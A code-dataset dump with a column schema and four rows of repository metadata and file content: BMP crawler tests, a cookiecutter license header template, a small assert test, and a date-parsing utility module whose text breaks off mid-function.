Dataset schema (one row per column):

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
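
To make the schema concrete, here is a minimal sketch of how a shard with these columns could be loaded and filtered. The file name, the 0.9 threshold, and the choice of output columns are illustrative assumptions; only the column names come from the schema above.

```python
# Minimal sketch, assuming the rows are stored in a Parquet shard with the
# columns listed above. "code_shard.parquet" is a hypothetical path.
import pandas as pd

df = pd.read_parquet("code_shard.parquet")

# Keep Python files that are not flagged as auto-generated and whose
# duplicated-5-gram character fraction stays below an arbitrary cutoff.
mask = (
    (df["lang"] == "Python")
    & (df["qsc_code_cate_autogen_quality_signal"] == 0)
    & (df["qsc_code_frac_chars_dupe_5grams_quality_signal"] < 0.9)
)
print(df.loc[mask, ["hexsha", "max_stars_repo_name", "size", "hits"]].head())
```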

Row 1
hexsha: fe3610d7e57f19aa8e5fe414a87d307b61838ada
size: 6,632
ext: py
lang: Python
max_stars_repo_path: tests/Crawler_bmp_tests.py
max_stars_repo_name: LukasTinnes/sPyRat
max_stars_repo_head_hexsha: 42e012e426befa3876e590be2ea83874d5351d12
max_stars_repo_licenses: ["Unlicense"]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: tests/Crawler_bmp_tests.py
max_issues_repo_name: LukasTinnes/sPyRat
max_issues_repo_head_hexsha: 42e012e426befa3876e590be2ea83874d5351d12
max_issues_repo_licenses: ["Unlicense"]
max_issues_count: 3
max_issues_repo_issues_event_min_datetime: 2022-02-07T19:53:47.000Z
max_issues_repo_issues_event_max_datetime: 2022-02-13T19:51:33.000Z
max_forks_repo_path: tests/Crawler_bmp_tests.py
max_forks_repo_name: LukasTinnes/sPyRat
max_forks_repo_head_hexsha: 42e012e426befa3876e590be2ea83874d5351d12
max_forks_repo_licenses: ["Unlicense"]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
content:
from crawling.crawlers.file_crawlers.bmp.bmp_crawler import BMPCrawler
import os
import pytest
PATH_PDN = "files\\bmp\\paintdotnet\\"
PATH_PAINT = "files\\bmp\\paint\\"
PATH_GIMP = "files\\bmp\\gimp\\"
PATH_WIKI = "files\\bmp\\wiki\\"
PATH_EXTRA = "files\\bmp\\extra\\"
POOLS = 4
PATTERN = "bmp"
### PAINT.NET tests
def test_pdn_32bpp_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PDN + "4Pix_32.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PDN + "4Pix_32.bmp")
def test_pdn_24bpp_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PDN + "4Pix_24.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PDN + "4Pix_24.bmp")
def test_pdn_8bpp_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PDN + "4Pix_8.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PDN + "4Pix_8.bmp")
def test_pdn_4bpp_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PDN + "4Pix_4.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PDN + "4Pix_4.bmp")
def test_pdn_1bpp_bmp():
"""
Ok so this is complicated.
For some reason Paint.NET gives two bits per pixel when you select 1.
Is there a good reason for this?
:return:
"""
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PDN + "4Pix_1.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PDN + "4Pix_1.bmp")
# GIMP TESTS
def test_gimp_R5G6B5_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP + "4Pix_R5G6B5.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_R5G6B5.bmp")
def test_gimp_R8G8B8_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP + "4Pix_R8G8B8.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_R8G8B8.bmp")
def test_gimp_X1R5G5B5_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP+ "4Pix_X1R5G5B5.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_X1R5G5B5.bmp")
def test_gimp_X8R8G8B8_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP + "4Pix_X8R8G8B8.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_X8R8G8B8.bmp")
# "Farbraum nicht mit schreiben" was selected for these.
def test_gimp_R5G6B5_no_color_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP + "4Pix_R5G6B5_no_color.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_R5G6B5_no_color.bmp")
def test_gimp_R8G8B8_no_color_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP + "4Pix_R8G8B8_no_color.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_R8G8B8_no_color.bmp")
def test_gimp_X1R5G5B5_no_color_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP+ "4Pix_X1R5G5B5_no_color.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_X1R5G5B5_no_color.bmp")
def test_gimp_X8R8G8B8_no_color_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP + "4Pix_X8R8G8B8_no_color.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_X8R8G8B8_no_color.bmp")
# PAINT TESTS
def test_paint_1_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PAINT + "4Pix_1.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PAINT + "4Pix_1.bmp")
def test_paint_16_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PAINT + "4Pix_16.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PAINT + "4Pix_16.bmp")
def test_paint_24_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PAINT + "4Pix_24.bmp")
assert frame.get_data_frame().shape[0] == 1
assert frame.get_data_frame()["size"].iloc[0] == os.path.getsize(PATH_PAINT + "4Pix_24.bmp")
def test_paint_256_depth_bmp():
"""
Ok so for some reason there is apparently a difference between saving in 24 bit and 256 color depth
even though that should be the exact same thing????????? IT HAS A KLIOBYTE OF DATA ?????????????
:return:
"""
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PAINT + "4Pix_256.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PAINT + "4Pix_256.bmp")
# Wikipedia Tests
def test_wiki_ex1_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_WIKI + "wiki_1.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_WIKI + "wiki_1.bmp")
# Misc functions test.
def test_wiki_ex1_bmp_0():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl_at_byte(PATH_WIKI + "wiki_1.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_WIKI + "wiki_1.bmp")
def test_wiki_ex1_bmp_1():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl_at_byte(PATH_WIKI + "wiki_1.bmp", 1)
assert frame.get_data_frame().shape[0] == 0
# Slow tests
@pytest.mark.slow
def test_hd_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_EXTRA + "synth spiral.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_EXTRA + "synth spiral.bmp")

avg_line_length: 36.844444
max_line_length: 113
alphanum_fraction: 0.695718
qsc_*_quality_signal columns (41 values, schema order, qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal):
1,006 | 6,632 | 4.326044 | 0.111332 | 0.103631 | 0.131893 | 0.169577 | 0.827895 | 0.773438 | 0.765625 | 0.74977 | 0.74977 | 0.723575 | 0 | 0.043024 | 0.148372 | 6,632 | 179 | 114 | 37.050279 | 0.727514 | 0.073432 | 0 | 0.373913 | 0 | 0 | 0.12882 | 0.03697 | 0 | 0 | 0 | 0 | 0.356522 | 1 | 0.182609 | false | 0 | 0.026087 | 0 | 0.208696 | 0
qsc_* columns without the _quality_signal suffix (41 values, same order, qsc_code_num_words through qsc_codepython_frac_lines_print):
0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0
hits: 7
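
In the rows shown, each qsc_*_quality_signal column carries a numeric measurement, while the same-named column without the suffix holds a 0/1/null value. As an illustration only, here is a minimal sketch of how a line-fraction style signal such as qsc_code_frac_lines_assert could be computed from a record's content field; this is an assumed definition for illustration, not the definition used to produce the numbers above.

```python
# Illustrative sketch: an assumed definition of a "fraction of lines that are
# assert statements" signal, computed over a record's `content` string.
# It is not claimed to reproduce the dataset's own qsc_* values.
def frac_lines_assert(content: str) -> float:
    lines = [line.strip() for line in content.splitlines() if line.strip()]
    if not lines:
        return 0.0
    assert_lines = sum(1 for line in lines if line.startswith("assert "))
    return assert_lines / len(lines)
```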

Row 2
hexsha: fea225f07b4fffab3dcf6ee4cd48e297176f53b4
size: 1,910
ext: py
lang: Python
max_stars_repo_path: {{cookiecutter.project_name}}/{{cookiecutter.project_slug}}/__init__.py
max_stars_repo_name: node13h/cookiecutter-python3
max_stars_repo_head_hexsha: 3c0864497b52b0fa3b2dcb6f31b18a8cf02d80ee
max_stars_repo_licenses: ["MIT"]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: {{cookiecutter.project_name}}/{{cookiecutter.project_slug}}/__init__.py
max_issues_repo_name: node13h/cookiecutter-python3
max_issues_repo_head_hexsha: 3c0864497b52b0fa3b2dcb6f31b18a8cf02d80ee
max_issues_repo_licenses: ["MIT"]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: {{cookiecutter.project_name}}/{{cookiecutter.project_slug}}/__init__.py
max_forks_repo_name: node13h/cookiecutter-python3
max_forks_repo_head_hexsha: 3c0864497b52b0fa3b2dcb6f31b18a8cf02d80ee
max_forks_repo_licenses: ["MIT"]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
content:
{% if cookiecutter.open_source_license == 'MIT' -%}
# MIT license
# Copyright {% now 'local', '%Y' %}, {{ cookiecutter.project_author }} <{{ cookiecutter.project_author_email }}>
{% elif cookiecutter.open_source_license == 'GPLv3' -%}
# {{ cookiecutter.project_description }}
# Copyright (C) {% now 'local', '%Y' %}, {{ cookiecutter.project_author }} <{{ cookiecutter.project_author_email }}>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
{% elif cookiecutter.open_source_license == 'AGPLv3' -%}
# {{ cookiecutter.project_description }}
# Copyright (C) {% now 'local', '%Y' %}, {{ cookiecutter.project_author }} <{{ cookiecutter.project_author_email }}>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
{% endif -%}

avg_line_length: 51.621622
max_line_length: 116
alphanum_fraction: 0.741361
qsc_*_quality_signal columns (41 values, schema order, qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal):
273 | 1,910 | 5.124542 | 0.304029 | 0.108649 | 0.107219 | 0.062187 | 0.950679 | 0.903503 | 0.899214 | 0.890636 | 0.890636 | 0.890636 | 0 | 0.002491 | 0.159162 | 1,910 | 36 | 117 | 53.055556 | 0.868618 | 0.875916 | 0 | 0 | 0 | 0 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0
qsc_* columns without the _quality_signal suffix (41 values, same order, qsc_code_num_words through qsc_codepython_frac_lines_print):
0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0
hits: 8

Row 3
hexsha: 2299444ea1e38c1263f8d6cd0b20f3afe0bbead0
size: 263
ext: py
lang: Python
max_stars_repo_path: tests/basic/assert.py
max_stars_repo_name: Fryguy/py2rb
max_stars_repo_head_hexsha: 0d2fbc5a86b82707a1d83241a21af6b2cc22c0b8
max_stars_repo_licenses: ["MIT"]
max_stars_count: 124
max_stars_repo_stars_event_min_datetime: 2017-08-19T05:37:16.000Z
max_stars_repo_stars_event_max_datetime: 2022-03-08T18:24:18.000Z
max_issues_repo_path: tests/basic/assert.py
max_issues_repo_name: JeMaMokuma/py2rb
max_issues_repo_head_hexsha: 0d2fbc5a86b82707a1d83241a21af6b2cc22c0b8
max_issues_repo_licenses: ["MIT"]
max_issues_count: 15
max_issues_repo_issues_event_min_datetime: 2017-12-16T05:59:31.000Z
max_issues_repo_issues_event_max_datetime: 2022-02-08T02:51:17.000Z
max_forks_repo_path: tests/basic/assert.py
max_forks_repo_name: JeMaMokuma/py2rb
max_forks_repo_head_hexsha: 0d2fbc5a86b82707a1d83241a21af6b2cc22c0b8
max_forks_repo_licenses: ["MIT"]
max_forks_count: 18
max_forks_repo_forks_event_min_datetime: 2017-09-25T11:57:04.000Z
max_forks_repo_forks_event_max_datetime: 2022-02-19T17:33:48.000Z
content:
try:
assert True, "no message"
except AssertionError as err:
print('AssertionError :', err)
except:
print('Error :')
try:
assert False, "error message"
except AssertionError as err:
print('AssertionError :', err)
except:
print('Error :')

avg_line_length: 18.785714
max_line_length: 34
alphanum_fraction: 0.661597
qsc_*_quality_signal columns (41 values, schema order, qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal):
30 | 263 | 5.8 | 0.4 | 0.103448 | 0.310345 | 0.333333 | 0.804598 | 0.804598 | 0.804598 | 0.804598 | 0.804598 | 0.804598 | 0 | 0 | 0.209125 | 263 | 13 | 35 | 20.230769 | 0.836538 | 0 | 0 | 0.833333 | 0 | 0 | 0.262357 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.333333
qsc_* columns without the _quality_signal suffix (41 values, same order, qsc_code_num_words through qsc_codepython_frac_lines_print):
0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0
effective: 0
hits: 11

Row 4
hexsha: 22ba02d7f072d942a4fe2bf565f12876c459d192
size: 15,652
ext: py
lang: Python
max_stars_repo_path: scalyr_agent/date_parsing_utils.py
max_stars_repo_name: Kami/scalyr-agent-2
max_stars_repo_head_hexsha: b26ebb6a74c2670ae28052079f2fac95d88e832a
max_stars_repo_licenses: ["Apache-2.0"]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: scalyr_agent/date_parsing_utils.py
max_issues_repo_name: Kami/scalyr-agent-2
max_issues_repo_head_hexsha: b26ebb6a74c2670ae28052079f2fac95d88e832a
max_issues_repo_licenses: ["Apache-2.0"]
max_issues_count: 1
max_issues_repo_issues_event_min_datetime: 2020-06-03T13:19:37.000Z
max_issues_repo_issues_event_max_datetime: 2020-06-03T13:35:28.000Z
max_forks_repo_path: scalyr_agent/date_parsing_utils.py
max_forks_repo_name: Kami/scalyr-agent-2
max_forks_repo_head_hexsha: b26ebb6a74c2670ae28052079f2fac95d88e832a
max_forks_repo_licenses: ["Apache-2.0"]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
content:
# Copyright 2014-2020 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module containing various date parsing related utility functions.
"""
from __future__ import absolute_import
if False:
from typing import Optional
import re
import time
import calendar
import datetime
import six
from six.moves import map
try:
import udatetime
except ImportError:
# if udatetime is not available, we fall back to the second fastest approach for date parsing
# (string.split approach)
udatetime = None
from scalyr_agent.compat import custom_any as any
if six.PY3:
# re.ASCII makes this regex only match ASCII digits which is tiny bit faster than the version
# without re.ASCII flag
RFC3339_STR_REGEX = re.compile(
r"(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2})", re.ASCII
)
else:
RFC3339_STR_REGEX = re.compile(r"(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2})")
# Private versions of datetime parsing functions are below. Those are not used by the production
# code, but there are there so we can test corectness of all the functions and benchmark different
# implementations and compare them.
def _rfc3339_to_nanoseconds_since_epoch_strptime(string):
# type: (str) -> Optional[int]
"""
rfc3339_to_nanoseconds_since_epoch variation which utilizes strptime approach.
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
try:
tm = time.strptime(parts[0], "%Y-%m-%dT%H:%M:%S")
except ValueError:
return None
nano_seconds = int(calendar.timegm(tm[0:6])) * 1000000000
nanos = 0
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if the fractional part doesn't end in Z we likely have a
# malformed time, so just return the current value
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return nano_seconds
# strip the final 'Z' and use the final number for processing
fractions = fractions[:-1]
to_nanos = 9 - len(fractions)
nanos = int(int(fractions) * 10 ** to_nanos)
return nano_seconds + nanos
def _rfc3339_to_nanoseconds_since_epoch_regex(string):
# type: (str) -> Optional[int]
"""
rfc3339_to_nanoseconds_since_epoch variation which utilizes regex approach.
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
try:
dt = datetime.datetime(
*list(map(int, RFC3339_STR_REGEX.match(parts[0]).groups())) # type: ignore
)
except Exception:
return None
nano_seconds = (
calendar.timegm((dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second))
* 1000000000
)
nanos = 0
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if the fractional part doesn't end in Z we likely have a
# malformed time, so just return the current value
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return nano_seconds
# strip the final 'Z' and use the final number for processing
fractions = fractions[:-1]
to_nanos = 9 - len(fractions)
nanos = int(int(fractions) * 10 ** to_nanos)
return nano_seconds + nanos
def _rfc3339_to_nanoseconds_since_epoch_string_split(string):
# type: (str) -> Optional[int]
"""
rfc3339_to_nanoseconds_since_epoch variation which utilizes string.split approach.
Returns nanoseconds from unix epoch from a rfc3339 formatted timestamp.
This doesn't do any complex testing and assumes the string is well formed and in UTC (e.g.
uses Z at the end rather than a time offset).
@param string: a date/time in rfc3339 format, e.g. 2015-08-03T09:12:43.143757463Z
@rtype int
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
try:
date_parts, time_parts = parts[0].split("T")
date_parts = date_parts.split("-") # type: ignore
time_parts = time_parts.split(":") # type: ignore
dt = datetime.datetime(
int(date_parts[0]),
int(date_parts[1]),
int(date_parts[2]),
int(time_parts[0]),
int(time_parts[1]),
int(time_parts[2]),
)
except Exception:
return None
nano_seconds = (
calendar.timegm((dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second))
* 1000000000
)
nanos = 0
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if the fractional part doesn't end in Z we likely have a
# malformed time, so just return the current value
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return nano_seconds
# strip the final 'Z' and use the final number for processing
fractions = fractions[:-1]
to_nanos = 9 - len(fractions)
nanos = int(int(fractions) * 10 ** to_nanos)
return nano_seconds + nanos
def _rfc3339_to_nanoseconds_since_epoch_udatetime(string):
"""
rfc3339_to_nanoseconds_since_epoch variation which utilizes udatetime library.
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
try:
dt = udatetime.from_string(parts[0])
except ValueError:
return None
nano_seconds = (
calendar.timegm((dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second))
* 1000000000
)
nanos = 0
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if the fractional part doesn't end in Z we likely have a
# malformed time, so just return the current value
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return nano_seconds
# strip the final 'Z' and use the final number for processing
fractions = fractions[:-1]
to_nanos = 9 - len(fractions)
nanos = int(int(fractions) * 10 ** to_nanos)
return nano_seconds + nanos
def _rfc3339_to_datetime_strptime(string):
# type: (str) -> Optional[datetime.datetime]
"""
rfc3339_to_datetime variation which utilizes strptime approach.
"""
# split the string in to main time and fractional component
